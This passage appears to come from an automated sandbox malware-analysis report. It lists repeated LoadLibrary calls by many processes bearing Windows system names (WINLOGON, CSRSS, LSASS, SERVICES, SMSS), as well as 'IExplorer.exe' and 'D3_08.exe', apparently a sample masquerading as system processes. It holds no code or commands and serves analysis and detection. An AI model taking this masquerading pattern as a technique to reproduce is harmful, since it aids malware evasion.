\"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003996)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003996)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002952)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002952)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004068)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004068)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004372)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004372)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00001176)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004364)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004364)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002444)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002444)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002444)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002444)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002444)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002444)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000272)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000272)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005880)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005880)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001960)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001960)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001960)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001960)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001960)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001960)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00003964)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00003964)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003572)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003572)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002304)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002304)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003728)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003728)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00002344)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00002344)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003232)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003232)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004336)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00004336)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004348)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004348)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000916)\n \"D3_08.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000916)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00000952)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter user32 (UID: 00000000-00000952)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003144)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003144)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003144)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003144)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003144)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003144)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003376)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003376)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001864)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001864)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00004268)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00004268)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004268)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00004268)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00006096)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00006096)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006096)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00006096)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00000572)\n \"IExplorer.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000572)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003328)\n \"SMSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003328)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003448)\n \"CSRSS.EXE\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00003448)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter OLEAUT32.DLL (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003280)\n \"LSASS.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00003280)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001340)\n \"WINLOGON.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001340)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter SXS.DLL (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001584)\n \"SERVICES.EXE\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00001584)\n \"SMSS.EXE\" called 